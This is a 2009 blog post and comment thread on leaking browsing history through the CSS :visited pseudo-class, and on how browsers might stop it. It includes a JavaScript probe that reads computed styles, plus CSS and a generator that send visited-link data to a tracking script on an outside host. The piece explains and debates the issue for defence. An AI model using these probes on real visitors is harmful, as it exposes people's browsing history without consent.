Sharovatov’s Weblog

startpanic.com and :visited links privacy issue

Posted in browsers, privacy, security by sharovatov on 21 April 2009

Back in April 2008 I blogged about Selectors API support in IE8 Beta 1 and mentioned the security concern about :visited links – potential privacy theft.

The problem

This concern was raised long ago in the CSS 2.1 spec (and then repeated in the specs that followed – CSS3 Selectors and the Selectors API spec):

Note. It is possible for style sheet authors to abuse the :link and :visited pseudo-classes to determine which sites a user has visited without the user’s consent.

UAs may therefore treat all links as unvisited links, or implement other measures to preserve the user’s privacy while rendering visited and unvisited links differently.

The original Bugzilla issue was reported back in October 2000, the Stanford same-origin whitepapers described the issue in 2002, lots of articles followed, and then an Ajaxian article in 2007 made the issue widely known.

And now we have http://startpanic.com with a nice implementation of this approach – it has a txt database of thousands of URLs that are tested for being visited.

You can check the code, it’s pretty straightforward: links from the database are appended to an iframe whose stylesheet displays :visited links and hides all others. The computed style of each link is then checked, and if the link is not hidden, it is appended to the big list of visited links.
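A minimal sketch of this kind of probe, not startpanic’s actual code. It assumes a stylesheet that hides unvisited links and shows visited ones; the function name, the `probe` class and the injected `doc` and `getStyle` parameters are all made up for illustration (in a browser you would pass `document` and `window.getComputedStyle`).

```javascript
// Hypothetical probe: returns the subset of `urls` whose links are not hidden.
// Assumes the page stylesheet contains something like:
//   a.probe:link    { display: none; }
//   a.probe:visited { display: inline; }
function findVisitedLinks(urls, doc, getStyle) {
  const visited = [];
  for (const url of urls) {
    const link = doc.createElement("a");
    link.href = url;
    link.className = "probe";
    doc.body.appendChild(link);
    // A link that is still displayed matched the :visited rule.
    if (getStyle(link).display !== "none") {
      visited.push(url);
    }
    doc.body.removeChild(link);
  }
  return visited;
}
```

Passing the document and the style lookup in as parameters keeps the sketch readable outside a real page. Browsers released after this post have restricted what getComputedStyle reports for :visited, so treat it as an illustration of the technique as it worked at the time.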

Possible solutions

Basically, there are a few ways to resolve this issue:

  1. try to protect :visited links computed style access
  2. limit support of :visited
  3. don’t fix it, find a way around

Protect :visited links programmatically

That’s clearly useless. People have suggested many solutions (all of which you can get round), like making getComputedStyle return the default value for :visited links as if they were not visited – but you can make the case more complex, e.g.

a:link span { display: none; }
a:visited span { display: block; }

and then use getComputedStyle to check the span; all the proposed solutions were weak in some way. But even if you manage to make scripts unaware of the state of your links, there will always be a server-side attack vector – for each link that you want to check you can just specify a unique background-image pointing to some server-side tracking script, e.g.:

#alQaedaLnk:visited { background: url(http://www.cia.gov/track.pl); }

Like here, for example. So it clearly shows us that there’s no way (or it’s too troublesome) to fix this “issue” programmatically.
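To make the script-free vector more concrete, here is a rough sketch of how a page could generate one such rule per link. The function names, the `probeN` ids and the `?id=` query parameter are invented for this example; the assumption is that the browser requests a background image only for links that match :visited, so the tracking script sees one request per visited URL.

```javascript
// Escape a string for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return value.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
}

// Hypothetical generator: one link and one :visited rule per URL to test.
// `trackerUrl` is an assumed server-side script that logs the `id` it receives.
function buildTrackingProbe(urls, trackerUrl) {
  const css = urls
    .map((_, i) => `#probe${i}:visited { background: url("${trackerUrl}?id=${i}"); }`)
    .join("\n");
  const html = urls
    .map((url, i) => `<a id="probe${i}" href="${escapeAttr(url)}">link</a>`)
    .join("\n");
  return { css, html };
}
```

No JavaScript has to run in the victim’s browser once the markup and stylesheet are served, which is why hiding link state from scripts alone would not close the hole.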

Limiting support for :visited

As I understood from the discussion with the startpanic.com author, he wants to limit :visited support so that the :visited pseudo-class is applied only to links pointing to pages on the same domain. But this would hurt user experience so much! The first example that comes to mind is Google and other search engines – they all colour visited links differently so you can clearly see which pages you’ve already been to and which you haven’t. If a same-domain policy is applied, all the links in Google search results will be plain blue. This sounds awful to me.

Guys from the Stanford security group suggest applying :visited only to those links that were visited from the current domain. This approach was used in a Firefox add-on called SafeHistory (it doesn’t work any more). So if you do a search in Google and visit some pages, :visited will be applied to links to these pages only in Google search results. If you then do the same search on MSN Live Search, all the links there will be plain blue and :visited won’t be applied to them. To me this solution looks weird as well. Firefox developers said that it would be a problem to support this, and I don’t think other browser vendors will fix this privacy “issue” in that way. Keep on reading, I will explain why.
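The bookkeeping this scheme needs can be sketched roughly as follows. This is not SafeHistory’s code; the class and method names are hypothetical, and origins are passed in as plain strings to keep the example short.

```javascript
// Hypothetical history store that remembers where each URL was opened from.
class ScopedHistory {
  constructor() {
    this.visits = new Map(); // visited URL -> Set of origins it was opened from
  }

  // Record that `url` was opened by following a link on a page at `fromOrigin`.
  recordVisit(url, fromOrigin) {
    if (!this.visits.has(url)) {
      this.visits.set(url, new Set());
    }
    this.visits.get(url).add(fromOrigin);
  }

  // A link to `url` is styled as :visited only on pages of an origin
  // from which the user actually followed it.
  isVisitedFor(url, pageOrigin) {
    const origins = this.visits.get(url);
    return origins !== undefined && origins.has(pageOrigin);
  }
}
```

For example, after `recordVisit("http://example.org/page", "http://www.google.com")`, the call `isVisitedFor("http://example.org/page", "http://www.google.com")` is true, while the same URL checked against any other origin is false. The price is that the browser has to store a referring origin for every history entry.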

So from a technical perspective the only easy solution would be to completely remove support for the :visited pseudo-class, which nobody will do because user experience will suffer and people will complain.

Best solution – find a way around

You may think – why not make :visited support configurable in the browser UI? But that’s what all browsers already have! You can specify that you don’t want to keep history at all; then you won’t see visited links anywhere and you will feel that you’re “safe” :).

Another solution – Private Browsing mode

Another nice option is to use the Private Browsing mode that’s supported by all modern browsers: IE8, Safari, Google Chrome (and then FF3.1 joined). When you visit a site that you don’t want to appear in the history, use Private Browsing mode and you’re safe.

Note: currently Google Chrome has a bug – it applies the :visited pseudo-class to links in Incognito mode. However, the bug is fixed and the bugfix will be included in one of the upcoming updates.

“Private Browsing” browser feature is the only true solution to this issue.

Here’s a testcase. I visited both http://ya.ru and http://www.google.com in IE8 InPrivate mode, then went to the testcase page, and it reported nothing, as if I hadn’t visited these URLs.

When I followed the same process in Google Chrome’s “Incognito mode”, it showed that I had visited both ya.ru and Google.com. This bug is fixed and the fix will ship in newer versions of Google Chrome.

And this issue is also fixed in FF3.1b3.

In comments Avdeev said that Safari in its Private Browsing mode (they call it Porn mode) didn’t show if the link was visited or not. Great stuff!

Update: It seems that Opera 10 will have Private browsing mode support as well – they are already choosing the name for it – and the most voted one is “Phantom mode” :)

Note: while I understand the whole concern about privacy, you shouldn’t forget that all search engines, ad providers and many, many others gather statistics about your visits. When you’re in London (and other major cities), you’re being watched on CCTV constantly. Does it bother you? Does this new world leave any space for privacy?

42 Responses

  1. SP said, on 21 April 2009 at 8:01 am

    The ability to access the :visited pseudo-class should work only for the site’s own domain. That’s it ;)

  2. sharovatov said, on 21 April 2009 at 8:17 am

    And why would it be so? The whole idea of hypertext is links between pages and sites. And colouring visited links differently is a nice visual pattern, a usability feature that shouldn’t be limited by same-origin policy. I’m still convinced that it should be configurable (as in FF) and disabled by default in “private browsing mode”.

  3. avdeev said, on 22 April 2009 at 3:26 am

    Safari does its job well. My Safari 3.2.1 just passed your testcase. Actually Safari was the first browser to implement private browsing.

  4. sharovatov said, on 22 April 2009 at 4:40 am

    That’s great, thanks for the update, Avdeev!

  5. Olivier Lalonde said, on 22 April 2009 at 6:28 am

    From my own experience, very _FEW_ sites or people care about the :visited visual pattern. I wouldn’t even notice if :visited stopped working!

  6. sharovatov said, on 22 April 2009 at 8:05 am

    I don’t know, Olivier, I notice it very often :)

  7. toxcct said, on 25 April 2009 at 12:21 pm

    And what if the browser implemented something like a safe-list (like browsers do for the popup blocker) and let the user say which sites are trustworthy?
    For such sites/domains, :visited could work across domains, but it would be ignored for untrusted sites?!

  8. sharovatov said, on 25 April 2009 at 2:57 pm

    Thanks for your idea. Adding this functionality to a phishing filter could do the job, but really, why do we need it if there’s Private Browsing mode, people can find all this information about you anyway, and search engines and other sites will still collect information about you? What’s the point?

    But anyway, if I were to fix this, I’d use your approach. It’s much easier than storing the referring page for every link in the history (as in the SafeHistory add-on) or prohibiting access to getComputedStyle for certain elements. I suggest you tell Mozilla developers about it here – https://bugzilla.mozilla.org/show_bug.cgi?id=147777

  9. Walt Gordon Jones said, on 26 April 2009 at 9:33 pm

    Current “private browsing” keeps sites out of your history, but this whole problem is more about white-listing what sites should *see* your history.

    Why not let the user select which domains can see cross-domain :visited pseudo class? This goes more toward the core issue than the current private browsing solutions.

  10. […] Here at Sharovatov’s, it is explained in programming terms how the relatively simple trick works: the browser cache is read. That is, the very cache you are always told to clear. […]

  11. Hugo Heden said, on 10 May 2009 at 8:19 pm

    How about something like what’s suggested in comment #104: https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c104

    That is, the browser would render one page to the user, while maintaining a separate and different copy of the page under the hood for access from content JavaScript. That separate copy would “pretend” that *nothing* is :visited (or perhaps that *everything* is :visited; that could perhaps be up to the calling JavaScript). This would make most exploits impossible, such as the one described in comment #50.

    One would of course still have to take care of lots of issues mentioned in the bug report (such as correctly handling loading of background images used only in :visited content etc etc)

    How would that work? I guess this is naive, but would be interested to hear in what way. Too much performance impact?

  12. sharovatov said, on 12 May 2009 at 6:32 am

    @Walt Gordon Jones – after thinking this through, I tend to agree with your point from the security perspective – if browsers maintain such whitelists, the whole problem will be gone.

    But from the usability perspective this approach is no different from disabling history altogether. Consider the following case: a user is doing research, gathering information on some topic, so when he goes to a website that’s not whitelisted yet, and the page he’s viewing contains loads of links, he won’t see which links he has already checked and which he hasn’t.

    You may say that if he’s doing research, he may turn :visited links protection off. So whitelisting limits usability in automatic mode because :visited will be disabled by default for all sites. And making users aware of the issue and teaching them how to operate the whitelist functionality is going to take a while. If this is possible, that would be great. However, I do think that browser vendors won’t do anything (and will say that there’s Private Browsing mode) or will stick to what the Stanford guys proposed. And I agree that it’s easier to teach people to launch Private Browsing mode when they need to surf anonymously than to teach them how to use whitelisting.

    @Hugo Heden – as you said, having two “layers” of :visited links support won’t protect from the background-image way of checking which links are visited and which are not. If I were to fix this issue, I wouldn’t take your approach – it would require too much work. I don’t think browser vendors will follow this route.

  13. Kermit said, on 18 May 2009 at 11:42 pm

    startpanic is certainly nice looking, but I find it very slow (my browser just hangs for 10 minutes or so). There’s a much faster alternative at http://linuxbox.co.uk/stealing-browser-history-with-javascipt-and-css.php

  14. sharovatov said, on 19 May 2009 at 11:50 am

    Kermit, that’s because your alternative has only 1000 addresses while startpanic has a database of 100 000 addresses. A hundred times more. Don’t you think it’d take a little bit more time to check 100 000 addresses than 1000? :)

  15. samhammer said, on 23 May 2009 at 3:40 pm

    Nice one!
    I really liked your post! Keep it up! The blog goes into my bookmarks and my reader!

  16. sharovatov said, on 24 May 2009 at 8:18 am

    Thanks :)

  17. bogdane said, on 27 May 2009 at 1:27 pm

    You’re missing an alternative: simply restricting what a :visited CSS rule can do. The way virtually all websites use :visited is to change link color, so by just white-listing a few properties like color or background-color and blocking all others you cover all use cases while leaking no information to the website (your display:none example wouldn’t work, for example). You could even allow background-image if the user agent always downloads the image regardless of whether the link was visited.

    AFAIK the reason this is not implemented in Firefox is that SVG would still give you tricky ways to access the color: http://www.w3.org/Graphics/SVG/WG/track/issues/2071

  18. Walt Gordon Jones said, on 5 June 2009 at 3:03 am

    @sharovatov I agree many users will understand “private browsing” better than whitelisting, but it’s a fallacy to say it has to be either/or. Browser vendors are free to provide both, and users can decide whether they want to use it.

    I would certainly use a whitelist if it were available since the visited links feature is really not that useful anyway except in very specific situations that usually involve frequently visited — and trusted — sites.

    Thanks for a really thoughtful article on the issue.

  19. sharovatov said, on 5 June 2009 at 6:24 pm

    @bogdane – allowing only certain properties (such as colour or background-image) won’t solve the problem – you can always use getComputedStyle to access the current element style. See the https://bug147777.bugzilla.mozilla.org/attachment.cgi?id=87324 testcase.

    @Walt Gordon Jones – well, can you suggest how these whitelists would be maintained? What’s the procedure for getting onto this whitelist and being thrown off it? First example – Microsoft launched bing.com recently; how soon would it get onto whitelists? Who would submit it? How would this work cross-browser? Or, another example – site X was whitelisted and then decided to gather statistics on which competitors its clients visit – who will throw it off the whitelist? What if this was only an XSS and the admins then fixed it in 1 day? I was thinking about this and couldn’t find any satisfactory solutions. But of course, I’m open to discussion :)

  20. Walt Gordon Jones said, on 5 June 2009 at 7:01 pm

    @sharovatov I don’t think there should be a master whitelist. Browsers right now let me mark a site as a favorite (worded differently depending on the browser). Why can’t I just mark a site as “trusted”, so that other sites don’t get my history information? My list would be different from yours. It’s maintained in the browser, which is where my links are being marked up anyway.

    My point is that it doesn’t have to be burdensome. For 99% of sites I really don’t need purple visited links. That’s a hold-over from an earlier era of the web, before anyone had any idea how it would be used today.

    The idea that the only way to protect your history data is to give up keeping history at all seems broken to me. Just because the information is in the browser, and I may use it in other ways, doesn’t mean it has to be used to mark up the rendered HTML on sites I visit. There’s nothing that inextricably ties history to the browser’s rendering engine.

  21. tom said, on 8 June 2009 at 4:12 pm

    Until we find a solution, someone should build a noisy history file for Firefox with 4 billion entries.

  22. sharovatov said, on 8 June 2009 at 8:09 pm

    @Walt Gordon Jones I see your point. Though this is quite reasonable and seems useful to me, I still don’t think that browser vendors will do it. First of all, almost all browser vendors are investing in promoting Private Browsing mode which “fixes” the issue. Do you think they will spend another fortune on implementing and promoting this feature while they already have something that fixes the problem? I don’t think so. And from the user’s perspective it’s easier to understand “a mode where nothing is stored and tracked” than a “list of trusted sites to which you have to add every site where you’d like :visited links applied”. I believe that nobody would ever add anything to such a list and we’d lose :visited links functionality altogether. The current approach is “allow everything and teach the user how to behave properly”; you propose to “prohibit everything and teach the user how to allow stuff”. From the security perspective your approach is clearly better, but to me it means that we’ll just lose this feature.

    And I don’t believe that you don’t notice coloured :visited links. I just went to digg, opened up a post about Hezbollah in Lebanon and then went to google to search for more details. The first thing that I noticed was the purple link that I’d just visited from digg. I don’t know, but it seems really useful to me.

  23. Walt Gordon Jones said, on 8 June 2009 at 9:19 pm

    @sharovatov

    The value of history tracking is not just in colored links. Chrome and Firefox both have auto-suggest in the address bar that utilizes your history. There should not be a tacit rule that for your browser to have auto-suggest, you also have to share that same history information with every rogue site out there (or any site, for that matter.)

    To put it differently, if using visited links to build a marketing profile on your site visitors is ethical, then everyone should be doing it openly. If it is unethical, there is a problem.

  24. sharovatov said, on 10 June 2009 at 5:48 am

    @Walt Gordon Jones

    I do think that separating the history store from the ways it’s being used is important. I also would like to have a way to configure every single aspect of my browser, including how it applies styles to different elements and pseudo-classes. But will any browser vendor allow such configuration? I doubt it. And even if one does, 99.99% of users won’t use it. Do you have an idea of how many Firefox users have actually used about:config to configure anything? I wouldn’t bet on it, but I think it’s a real minority.

    Again – I love your suggestion, but I don’t think any browser vendor will take it because they already have private modes and they spent a fortune on promoting them.

    As to the marketing stats – no one’s objecting to Google getting marketing statistics and creating user profiles based on how and what users search, no one’s objecting to CCTV cameras installed every 5 meters in London, no one’s objecting to contextual ads being displayed. Yes, marketing stats can be gathered, but they can be gathered in so many other ways that this one is really not so important (in my view), mainly because there are Private Modes which must be used when you don’t want anyone to know where you’ve been.

    Btw, thanks for the interesting conversation, I really appreciate it! And thanks for the interesting blog, I subscribed to your RSS.

  25. jVincent said, on 14 June 2009 at 9:32 am

    I heavily disagree with the statement
    ““Private Browsing” browser feature is the only true solution to this issue.”

    The problem isn’t that visited links render differently, it’s that the server side can determine which rendering was chosen. The simplest solution is simply to render both versions, and then choose on the client side which one to show to the user, without the server side ever finding out.

    This approach comes from the nice and more general attitude that the user side should be able to use local content to generate the final rendering without it being necessary to transfer information to the server side.

  26. sharovatov said, on 14 June 2009 at 6:39 pm

    @jVincent

    Sorry, mate, I didn’t understand anything from your comment. Did you read this blogpost?

  27. Walt Gordon Jones said, on 14 June 2009 at 6:55 pm

    @sharovatov

    The future will tell what browser vendors will do. I have no idea. It will be interesting to see if this topic ever crosses over from developer blogs to the mainstream.

    Thanks for subscribing to my blog!

    Walt

  28. sharovatov said, on 14 June 2009 at 7:02 pm

    @Walt Gordon Jones

    You’re absolutely right about the future. Let’s see how Firefox handles the issue – Bugzilla entry 147777 has a very detailed discussion on this topic.

    And thanks for great conversation :) Your blog inspired me to install RoR, which I haven’t been using for almost 2 years. Cool :)

  29. David Hagler said, on 15 June 2009 at 5:43 am

    Well, just my two cents, but if the browser preloaded the files referenced in any style sheet, it would make this attack useless, and waste very few resources, if any.

    I would argue that any website that references a file in its style sheet is aiming to use that file at some point, and unless you have massive amounts of style information referring to lots of images not on the current page (you should redesign, but…), this should be a fair fix that doesn’t require copious amounts of security rewriting and code manipulation in current browsers.

  30. […] has been made to limit how history gets *out* of the browser. Here is what I said in a comment on Vitaly Sharovatov’s blog and has been quoted on Slashdot: The idea that the only way to protect your history data is to give […]

  31. Walt Gordon Jones said, on 18 July 2009 at 6:40 pm

    @sharovatov I just noticed our exchange here was referenced in comments on Slashdot ( http://slashdot.org/article.pl?sid=09/06/13/2125211 ), and it has inspired me to go ahead and write about the situation from my point of view. :) ( http://waltgordonjones.com/244/just-dont-have-anything-worth-stealing ) I hope you’ll take a look, and thanks again for your excellent post and conversation here on the issue.

    @David Very good point, but there is still a javascript way to do this, and I think the attitude to just turn off javascript is as much a non-solution as to just turn off history.

  34. Jake said, on 1 August 2009 at 1:29 am

    Excellent article, thank you!
    However, my concern is that there are sites that collect email addresses for upcoming spam under the false pretense of a “petition”. We’ll have to figure out a better way to protect privacy…

    Once again, thank you!

  38. […] See also startpanic.com and :visited links privacy issue. […]

  39. […] in browsers, privacy by sharovatov on 17 March 2010 This is a follow up to my old post about :visited links privacy issue. I thought the best solution for this issue would be educating users about the problem and […]

  41. […] information to sites you visit – via a weakness that’s been there since CSS 2.1 (read this for […]

